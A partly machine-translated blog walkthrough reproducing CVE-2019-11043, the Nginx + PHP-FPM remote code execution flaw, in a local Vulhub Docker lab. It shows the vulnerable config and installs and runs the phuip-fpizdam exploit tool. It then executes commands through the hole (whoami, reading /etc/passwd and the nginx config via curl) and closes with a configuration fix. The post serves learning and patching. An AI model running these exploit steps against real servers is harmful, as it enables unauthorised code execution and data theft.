(This article is only normal learning record, if any error please chiefs pointed out that if this article can help you that I am also very happy friends)
The reproduction of the reference network in the article that could reproduce only for learning exchanges, illegal use is strictly prohibited! ! !
I. INTRODUCTION
CVE-2019-11043: vulnerability exists in remote code execution vulnerability, use certain configurations Nginx + PHP-FPM server, could allow an attacker to remotely execute code, when + PHP-FPM server URL to send% 0a Nginx, server abnormal return
- This vulnerability requires specific configuration in order to trigger nginx.conf, the specific configuration is as follows
1 location ~ [^/]\.php(/|$) { 2 ... 3 fastcgi_split_path_info ^(.+?\.php)(/.*)$; 4 fastcgi_param PATH_INFO $fastcgi_path_info; 5 fastcgi_pass php:9000; 6 ... 7 }
- An attacker can use the line feed (% 0a) to destroy fastcgi_split_path_info instruction Regexp, Regexp damage caused PATH_INFO is empty, triggering the vulnerability
- Sphere of influence: PHP5.6-7.x
(Introduction from http://blog.leanote.com/post/snowming/9da184ef24bd in great detail, thanks!)
Second, the vulnerability reproduction process
1. Preparing the Environment
- Before using Docker installed in a reproduced Kali, the installation process, please see https://www.cnblogs.com/yankaohaitaiwei/p/11788333.htm
- In Kali the need to install the tool phuip-fpizdam (install the tool easy to test in Kali, the attacker and then drone Kali are the same, you do not want the attacker and drones are the same, installed on the attacker's host the tool, and the attacker must be in communication with the drone)
- Download phuip-fpizdam
git clone https://github.com/neex/phuip-fpizdam
-
- Into good phuip-fpizdam download directory, you can see there are many .go file, indicating that the tool needs to go language environment support
-
- Installation go environment
go see if there go environment environment, any return will help apt install golang-go 安装go go go version View version
-
- Installation phuip-fpizdam
go get -u github.com/neex/phuip-fpizdam
2. Start Docker, enter CVE-2019-11043 in the Vulhub php directory, start the whole environment
/etc/init.d/docker start
cd vulhub-master/
cd php
cd CVE-2019-11043
docker-compose up -d
3. Check port
docker ps 列出所有在运行的容器信息
4.根据回显,在宿主机的浏览器上访问使用Vulhub搭建好的所存有漏洞的站点
5.回到Kali,启动工具phuip-fpizdam
1 cd go/bin 2 ./phuip-fpizdam
6.检验漏洞是否存在
./phuip-fpizdam http://127.0.0.1:8080/index.php
- 根据回显可知漏洞存在,且漏洞的利用方式也给出了
7.漏洞利用,也可将whoami换成其他命令,如:ls、cat /etc/passwd等等,这里不做过多演示
- 更换为ifconfig命令可能不会成功,可能是Docker环境不支持ifconfig
curl "http://127.0.0.1:8080/index.php?a=whoami"
- 如果一次运行没有成功,多试几次即可
三、修复
1.查看运行的Docker
docker ps
2.进入容器内部,并在Nginx配置文件下查找fastcgi_split_path_info
1 docker exec -it b92dfa82075b /bin/bash 2 grep -Rin --color 'fastcgi_split_path_info' /etc/nginx/
3.读取Nginx的配置文件,找到fastcgi_split_path_info(用作URL匹配)和fastcgi_param PATH_INFO,将其注释即可完成修复
1 cat /etc/nginx/conf.d/default.conf 2 或 3 curl "http://127.0.0.1:8080/index.php?=cat /etc/nginx/conf.d/default.conf" 利用漏洞
